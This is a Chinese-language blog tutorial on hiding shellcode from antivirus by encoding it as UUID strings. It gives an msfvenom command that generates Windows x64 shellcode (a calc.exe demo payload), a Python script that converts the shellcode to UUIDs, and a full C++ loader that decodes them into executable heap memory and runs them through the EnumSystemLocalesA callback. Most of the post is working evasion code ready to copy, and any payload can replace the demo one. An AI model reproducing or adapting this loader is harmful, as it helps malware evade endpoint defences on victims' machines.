原理分析

UUID

通用唯一标识符（universally unique identifier, UUID）是一个128位的用于在计算机系统中以识别信息的数目。在Windows中也有使用GUID来标识唯一对象

将shellcode转换为uuid

用msf生成shellcode

1	`msfvenom -p windows/x64/exec CMD="calc.exe" -f c`

16个字节转换为一个uuid值，不满时用\x00填充，\x00占一个字节

首先用python把shellcode转换为uuid

1	`uuid.UUID(bytes_le=u)`

uuid转换为字节

1	`uuid.UUID('1f748bef-481c-fe01-8b34-ae4801f799ff').bytes_le`

将shellcode转换为uuid，不足十六个字节的用\x00补全

import uuid

shellcode=b'\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00'
shellcodelist=[]

if(len(shellcode)%16!=0):
    while len(shellcode)%16!=0:
        shellcode+=b'\x00'

for i in range(len(shellcode)//16):
    u=str(uuid.UUID(bytes_le=shellcode[i*16:i*16+16]))
    shellcodelist.append(u)
print(shellcodelist)

加载shellcode

#include <Windows.h>
#include <Rpc.h>
#include <iostream>

#pragma comment(lib, "Rpcrt4.lib")

const char* uuids[] =
{
"e48348fc-e8f0-00c0-0000-415141505251",
"d2314856-4865-528b-6048-8b5218488b52",
"728b4820-4850-b70f-4a4a-4d31c94831c0",
"7c613cac-2c02-4120-c1c9-0d4101c1e2ed",
"48514152-528b-8b20-423c-4801d08b8088",
"48000000-c085-6774-4801-d0508b481844",
"4920408b-d001-56e3-48ff-c9418b348848",
"314dd601-48c9-c031-ac41-c1c90d4101c1",
"f175e038-034c-244c-0845-39d175d85844",
"4924408b-d001-4166-8b0c-48448b401c49",
"8b41d001-8804-0148-d041-5841585e595a",
"59415841-5a41-8348-ec20-4152ffe05841",
"8b485a59-e912-ff57-ffff-5d48ba010000",
"00000000-4800-8d8d-0101-000041ba318b",
"d5ff876f-f0bb-a2b5-5641-baa695bd9dff",
"c48348d5-3c28-7c06-0a80-fbe07505bb47",
"6a6f7213-5900-8941-daff-d563616c632e",
"00657865-0000-0000-0000-000000000000",
};

int main()
{
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    void* ha = HeapAlloc(hc, 0, 0x100000); //ha为指向申请堆的首地址的指针
    DWORD_PTR hptr = (DWORD_PTR)ha;   //让hptr指向ha
    int elems = sizeof(uuids) / sizeof(uuids[0]);

    for (int i = 0; i < elems; i++) {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);//转换后指向uuid地址保存在hptr
        if (status != RPC_S_OK) {
            printf("failed");
            CloseHandle(ha);
            return -1;
        }
        hptr += 16;

    }
    EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); //把EnumSystemLocalesA参数中的回调函数设置为指向shellcode地址指针，执行shellcode
    CloseHandle(ha);
    return 0;
}

执行成功

API函数

UuidFromStringA

将字符串形式的shellcode转换为UUID，成功返回RPC_S_OK，失败返回RPC_S_INVALID_STRING_UUID

RPC_STATUS UuidFromStringA(
  RPC_CSTR StringUuid, //指向字符串的指针
  UUID     *Uuid //以二进制形式返回指向UUID的指针。 
);

EnumSystemLocalesA

功能为枚举操作系统上安装或支持的语言环境，第一个参数为指向应用程序定义的回调函数的指针，将它设置为指向UUID的指针即可执行shellcode

BOOL EnumSystemLocalesA(
  LOCALE_ENUMPROCA lpLocaleEnumProc, ///指向应用程序定义的回调函数的指针
  DWORD            dwFlags //指定要枚举的语言环境标识符的标志
);

本博客所有文章除特别声明外，均采用 CC BY-SA 4.0 协议，转载请注明出处！

使用COM组件创建计划任务上一篇

注册表劫持BypassUAC 下一篇

uuid免杀